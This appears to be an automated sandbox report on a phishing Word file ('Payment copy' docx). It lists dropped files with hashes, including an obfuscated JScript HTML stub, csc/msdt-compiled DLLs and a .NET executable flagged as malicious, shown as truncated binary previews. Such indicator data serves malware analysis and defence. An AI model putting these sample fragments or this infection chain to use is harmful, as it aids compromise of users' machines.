                                                                                                                                      Preview:<!DOCtYpe HTML>....<HTML>....<BoDY>....<SCrIPt tYPE="tExT/jscriPt">....//h0dZzxaXmdafHlX0peZ3Z6KdUZZJWUzo5yImhiYs23ky3QbfS1f5QchuYj7Z23xqB4rX1uTcMWxKu6tqkeFx4wq67bofKXUQtZUOMJ0leLPGFZ4acpSAwsQE6Rn6pfFZ8jKq7inOpnEKTaouxoSFRC5LQYEQuHsLnrWRhtVUm9a31xlrfuPjxgVSyDI9z73koEGhVdn7PgdwGSaTgNSAu7Kbgh7qUyQo38fAxiJIdgWYcrvltWm3hHDpQIr0oceaSpvNRuj4NRPOUxRlCbVxjxo87HgALrN5tbArN0gRVES1IXnWWuoOQvnafwksWSGLJlZ7BnqSxKpwQMd3kiqsBxnCzYCfiCyPaYHjE2rAd1fiIDcOoJlyOrUzzOD3Ms9HeHRBxWNZQa7qKtPaaziBTOW1YkvZrFT1NDE2l25iFJNttAfd00r4qLXIcuUkb7Zehemp2Nbd0SYLQo2bxfN8tUEr38580F7CVqH3CHcMcLqmJcAULEOu2cEknjqFUQlhi6rGfZluyDNhyNjL6z5wfVBykxwbQRABEgg0p0hKzMJenqND6EalCvmao6WlG4ygxtum5N6dZ5p9Dom5HE4t3gdcsSkFM5rDn0h9sSbsce3jc5Y2WGhrbXR4sIlZAHSpfHCcZ2r52KAwQPO4jcbDIIp1htkI4QSXT1ZjatYGjQII2ZwEqZyTVhTSGYqvTJTP6Vx1KoJTcCdLqNrYjPvAeY1RSWC0njCQT1W0EYojbwIaGan3JOeq8e8zC6y3QQGeVpREevg5avTahzPlVqI0MkS8PaLcmDL75EqE2hcXUSJrZMMiC00DkeeuxEREGs4p7UuWlfF9BnyvHUIxJBwyg7NMmKQPHA8qWtldGaEvcDaLD8tVkeGqavHUm9TgFt9CDkb7wFEuf1Lcn7mPPg8Krt2Lr0ibYoo
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols, created Tue Dec 20 22:15:19 2022, 1st section name ".debug$S"
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1364
                                                                                                                                      Entropy (8bit):4.101052508447827
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HNFC9AW7F5A2H5hKnyfeI+ycuZhNORakSRWPNnq9Wd:thW7F5A2nKnym1ulUa3Iq9m
                                                                                                                                      MD5:40FC2C8882D80BF450FDB1440FA8908D
                                                                                                                                      SHA1:1A0EE5EED4078E6274F199D6404FBBAE98311232
                                                                                                                                      SHA-256:F2C59F3C2E2F83940877C101A4A0959F64DD10887D0BCECD3E248497CDD40C1A
                                                                                                                                      SHA-512:7CAC959BE5E13F59025DB8E2E9276240FF7386945A5FB138DEDC47FBC2C2417BD36246F214A3D2E00CF0D6C09B81A7F1BECE4999C7738604652DAD7C0AEC058F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L....3.c.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP...................b..q..2..^}]...........5.......C:\Users\user\AppData\Local\Temp\RESBBFF.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.j.s.b.g.2.w.l...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols, created Tue Dec 20 22:15:22 2022, 1st section name ".debug$S"
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1368
                                                                                                                                      Entropy (8bit):4.087921279068652
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Hg3W9ok7Gml8H1hKnyfeI+ycuZhN+akSmPNnq9Yld:G/uGml8DKnym1ul+a3aq9YP
                                                                                                                                      MD5:9DB740FA4600D9536F6380F97F1F1D81
                                                                                                                                      SHA1:C8C1B401704F8CB67DA207CD00E16EB3511EEB28
                                                                                                                                      SHA-256:A94477149561D93605258CC3077699B66226D811454489D7751857525AA5EFF2
                                                                                                                                      SHA-512:396EF6C62D7FE717426130F4D7C36826E72D9A95A211374479F292C36AB9F4787316FEDB62645364B92DE0788BDE1355AC1EE122F40E1AF2B631E142B252B78B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L....3.c.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP.................../M.g..C0....E%u..........5.......C:\Users\user\AppData\Local\Temp\RESC7C7.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.f.0.1.c.j.t.2...d.l.l.....(.....L.e.g.a.l.C.
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols, created Tue Dec 20 22:15:30 2022, 1st section name ".debug$S"
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1368
                                                                                                                                      Entropy (8bit):4.06707224953585
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:H73W9oYnP7HEhKnyfeI+ycuZhNHakSJPNnq9Yld:j/wz2Knym1ulHa3rq9YP
                                                                                                                                      MD5:F06D46F0D52B00871DE876DF1BC85BF6
                                                                                                                                      SHA1:3011CE90C67AEDDCFC931E2DF85FA8B5406DD206
                                                                                                                                      SHA-256:484708E37EC4D08C459CFCE33723B8FBAFEB417BBD3F35CFA88CA4F07BF9F1B8
                                                                                                                                      SHA-512:3119E51EF3244A00C2A77CF8D3A632C0262F7D1936A5CD41A7D4D68385964F57290201FD932B28B3CC51A96B64C5FF01C18A7A3348922BEA202C31981A5B2A8C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L....4.c.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP..................,C..68.2*..%..h...........5.......C:\Users\user\AppData\Local\Temp\RESE5AF.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.n.m.1.s.n.w.x...d.l.l.....(.....L.e.g.a.l.C.
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.097418828880271
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFak7YnqqJPN5Dlq5J:+RI+ycuZhNHakSJPNnqX
                                                                                                                                      MD5:2C43B4B4363800322A99EB25090568AC
                                                                                                                                      SHA1:862B9B5F18553CD35E912469E0741137E1FCAD66
                                                                                                                                      SHA-256:BD825478BA796BA39A506A6C91D3C1274C947282D510D15E0B1263A240488DC2
                                                                                                                                      SHA-512:54FB346DAE535844BDC5B35D1F85AD67A7E340D316663A6DE32CB7345B7B75CDDB76C865D9DBE29A8218D293047404235891A596D225C805C7E0AB08B05A41B3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.n.m.1.s.n.w.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.n.m.1.s.n.w.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3072
                                                                                                                                      Entropy (8bit):2.7563975614745995
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:etGSplEZmoY2rjB8a8Htzk2SJltkZfxWqCw1WI+ycuZhNHakSJPNnq:6plboFeau8QJxWq21ulHa3rq
                                                                                                                                      MD5:9D91EAB662E2388525D6EE5B47159801
                                                                                                                                      SHA1:F2E95F5592B5AA5FB88BE5EF547D17F55B786E44
                                                                                                                                      SHA-256:95C9F839F226B7C4FC61FA7A0A5F61BD6CA74A2B77E0F2BDB90D94609F2B5651
                                                                                                                                      SHA-512:CC03D718AEE40E521210822C0F3B9E3ACA10E453992911495C6F748CEB6BACABD54822A3890BAB0322724894BCDE3030A9AED3475E7A412E91D84E2776F555D2
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4.c...........!.................#... ...@....... ....................................@.................................@#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&...|.\.....\.......................................... 4.....P ......F.........L.....O.....S.....V.....Y...F.....F...!.F.....F.......!.....*.......4..................................................<Module>.mn
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.10673009087742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryC3Rak7YnqqR3WPN5Dlq5J:+RI+ycuZhNORakSRWPNnqX
                                                                                                                                      MD5:FE7FCD62FC817186E132AF045E7D5DB3
                                                                                                                                      SHA1:9A642E2B6A6B6673BE0AD676805EA7FD77E2DA19
                                                                                                                                      SHA-256:CCFCD9D169A2FA05139FA0C98EDD8CF1B5093AB15EE7FB2D98B2318D739AC120
                                                                                                                                      SHA-512:AD1896893DE173DB8105B9D3160103DEC96E164ACF52E985DB2C579D353788211B5C11704C42752DAE79B9202977C7D6D49651B8CA039956F0B55D9617ED88DF
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.j.s.b.g.2.w.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.j.s.b.g.2.w.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5120
                                                                                                                                      Entropy (8bit):3.7807012254070815
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:6+oPhmKraYZkH8KTibUyOkwjj0Jl/C+CFSlwY2c1ulUa3Iq:gDaAkHHo4k8GDCuiCK
                                                                                                                                      MD5:8E841113C261020EC331301E8EA95FF1
                                                                                                                                      SHA1:87327FD70AE30C8B7E7FDE677A9A1861C20ABCC3
                                                                                                                                      SHA-256:0050E943E39929EEBE15596558C45EA0013BEA50683C563CC067EF6D50836701
                                                                                                                                      SHA-512:55B9B299ECB57831A18B2CEE4042368C90CFC3BE3E37DA615A1C9D532A34AC5361D3F7B1A9A5D1770F95CF723E3DC4ABF658A25E2F2E2DDD8E0813651932F9F6
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3.c...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.114284520242683
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAak7YnqqmPN5Dlq5J:+RI+ycuZhN+akSmPNnqX
                                                                                                                                      MD5:DC2F4DBB67DF174330B6FA95DC452575
                                                                                                                                      SHA1:78BD93FA7A908C025392F4C5831CA9E97D506510
                                                                                                                                      SHA-256:12FF8D595E979C28792CC061C54F13F76E500C81CD784C35EEC20CB6B890B267
                                                                                                                                      SHA-512:C6B7E756C3F66677AB2A2215A1426F0DBDD8302A74A633FA10F48EDC7FF06F6C3A87969505EE3D32257F810A6E3B91E51D6B6CB7BB224046ED8224E77C9A96A7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.f.0.1.c.j.t.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.f.0.1.c.j.t.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3584
                                                                                                                                      Entropy (8bit):3.0913082990719554
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:etGSP9pz1qlkCe745Q7GslPorREjvX5ekjV4gztkZf8jy6Iv+TOBWI+ycuZhN+a3:67pqb927GslPuEDRjyJ2ck1ul+a3aq
                                                                                                                                      MD5:98F7687F9AD551B97B536497BC02895F
                                                                                                                                      SHA1:19CA5F6ED4CCC75C28BE47E1FFEB38B401FA1679
                                                                                                                                      SHA-256:87DFA2576F7173C54D1D6EC2E081485D238153541097A8373C6F116C21F07D8E
                                                                                                                                      SHA-512:98783F9CEDC7DD4BA22CB093F3B1DF52AC7CDAC7B3525D97CEAB582D95A31EBE82DFA29C2A450B26DD17DC39781E1A97432205A545641C0F4B42AF40A509D35A
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....3.c...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 16 21:23:07 2022, mtime=Tue Dec 20 21:14:40 2022, atime=Tue Dec 20 21:14:17 2022, length=110504, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1135
                                                                                                                                      Entropy (8bit):4.696246643727346
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:80fXKOUf6CHiDO2aGXVD2i+WxKk2jA+/yRevyjRmKDyA5viPviT4t2Y+xIBjKZm:8OXW2zJ2qbKA+KRevyjRrDyE7aB6m
                                                                                                                                      MD5:1C4B189F901D3F0320BC0EFC7C62C7E6
                                                                                                                                      SHA1:635A94CD6CA12CF28D2154B45B90EC217A159A67
                                                                                                                                      SHA-256:2F891729078A24AC1CBE4DBE8542D640E3605557735D378DA1DC86FB71FFEA10
                                                                                                                                      SHA-512:FD31CCFF0F17646DA50DD0FD0EAC97C6A07C33F2CD3D5221643F221C5437D433C29EFDC69A02F4DE58595024C7D6CA120DA46ECF13B46C2D2F0EB75FA86D4EEA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L..................F.... ...B........t.......g.................................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...U.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1......U...user..>.......NM..U......S....................:.8.a.l.f.o.n.s.....~.1......U...Desktop.h.......NM..U......Y..............>.......m.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......U. .PAYMEN~1.DOC..l.......U.U.....`......................t..P.a.y.m.e.n.t. .c.o.p.y._.2.9.1.1.0.2.2...d.o.c.x...d.o.c.......d...............-.......c...........>.S......C:\Users\user\Desktop\Payment copy_2911022.docx.doc..4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t. .c.o.p.y._.2.9.1.1.0.2.2...d.o.c.x...d.o.c.........:..,.LB.)...Aw...`.......X.......061544...........!a..%.H.VZAj...#1...........W...!a..%.H.VZAj...#1...........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:Generic INItialization configuration [doc]
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):101
                                                                                                                                      Entropy (8bit):4.8491372958945425
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:bDuMJltDLhVjO1LXJFSmX1OeLhVjO1LXJFSv:bCmDFVyBZFEeFVyBZFc
                                                                                                                                      MD5:83166E435F433132ECCE71984113EC6B
                                                                                                                                      SHA1:630B8125CF2F042D3C939B375300C4A03B849927
                                                                                                                                      SHA-256:DEE2789C5DBCFF0EA579537C38D15E0626092269B5842B7D1BAAFBA4DC43F308
                                                                                                                                      SHA-512:DFE14FDBE0BC45AD547A41CE549670CD1F9B39210E698A09BF558D643B7159D740E7C52A2773F6F9E44AD9FF07DE877C8FDD709864CA8668556B86AA82135D9B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:[folders]..Templates.LNK=0..Payment copy_2911022.docx.LNK=0..[doc]..Payment copy_2911022.docx.LNK=0..
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):162
                                                                                                                                      Entropy (8bit):2.2176866822593855
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Rl/ZdH3KcRlpXtlqKaGclilt/9d3Pf/Z:RtZF6cDpKAclG9fp
                                                                                                                                      MD5:4C91944AA2F600B7E6ED428F40C755B7
                                                                                                                                      SHA1:2CBEE65F3B204188A112A9B55989B44A56D956B8
                                                                                                                                      SHA-256:FFADC0028A08DA39C26C1DE8DD419414DC4133CD8609E79EA0AFED17A719D016
                                                                                                                                      SHA-512:B8BB3DF46466CC3706FB090F4934103782CD45F53CBA080B35F8F6406AC2ED511388CF2E15F9AE4F467899C9AE8B99DF41839F65D3132B2772489BD0B9F11E5E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h.........s..y............T.......6C.........y./..........................{..y.0..............
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):20
                                                                                                                                      Entropy (8bit):2.8954618442383215
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:QVNliGn:Q9rn
                                                                                                                                      MD5:C4F79900719F08A6F11287E3C7991493
                                                                                                                                      SHA1:754325A769BE6ECCC664002CD8F6BDB0D0B8CA4D
                                                                                                                                      SHA-256:625CA96CCA65A363CC76429804FF47520B103D2044BA559B11EB02AB7B4D79A8
                                                                                                                                      SHA-512:0F3C498BC7680B4C9167F790CC0BE6C889354AF703ABF0547F87B78FEB0BAA9F5220691DF511192B36AD9F3F69E547E6D382833E6BC25CDB4CD2191920970C5F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..p.r.a.t.e.s.h.....
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2
                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Qn:Qn
                                                                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..
                                                                                                                                      Process:C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1187840
                                                                                                                                      Entropy (8bit):7.694771401738945
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:aucfV6hgv0QFYDQ+ccbb1bwaZ+ZgAC0G3yMjS+837EptQlKT:hcNT0CYDQ+ccbb5DZqC0OyMuzyt+K
                                                                                                                                      MD5:65FACCEC1C27EA47BF295191E93BFF41
                                                                                                                                      SHA1:ED1B66F2B4E1BA60DE601CDB9CA230338AE167CE
                                                                                                                                      SHA-256:0C31951E2A4B9376D72EB266EE9BDF6F0AC513DFBC2F918FF344202100CD0973
                                                                                                                                      SHA-512:038E543D478D988EAE2E4DAB6B148ACC4084A79F660418C979642424695B735AB24A1E24D868C62E098BD1015C8E4996A85E9BE6A3D1FAEF888C63DB7B153EFB
                                                                                                                                      Malicious:true
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .c..............P..............'... ...@....@.. ....................................@.................................@'..K....@..,....................`.......&............................................... ............... ..H............text........ ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................p'......H.......$g..D...........h....>..........................................n~Y...(N...8.....(....8....*&~.......*...~....*.v~Y...(N...8......(....8.....*..&~.......*...~....*..0..~.......8........E....B...8=...*~Y...(N...8....s.........8-...s.........8....s.........8....s.........8....s......... .....:....&8.......0..$.......8....8....8.....~....o......8......*.0..$.......8......*8....8.....~....o......8.....0..$.......8....8....8.....~....o......8......*.0..$.......8......*8...
                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):162
                                                                                                                                      Entropy (8bit):2.2176866822593855
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Rl/ZdH3KcRlpXtlqKaGclilt/9d3Pf/Z:RtZF6cDpKAclG9fp
                                                                                                                                      MD5:4C91944AA2F600B7E6ED428F40C755B7
                                                                                                                                      SHA1:2CBEE65F3B204188A112A9B55989B44A56D956B8
                                                                                                                                      SHA-256:FFADC0028A08DA39C26C1DE8DD419414DC4133CD8609E79EA0AFED17A719D016
                                                                                                                                      SHA-512:B8BB3DF46466CC3706FB090F4934103782CD45F53CBA080B35F8F6406AC2ED511388CF2E15F9AE4F467899C9AE8B99DF41839F65D3132B2772489BD0B9F11E5E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.pratesh................................................p.r.a.t.e.s.h.........s..y............T.......6C.........y./..........................{..y.0..............
                                                                                                                                      Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):24702
                                                                                                                                      Entropy (8bit):4.37978533849437
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                      MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                      SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                      SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                      SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                      Malicious:false
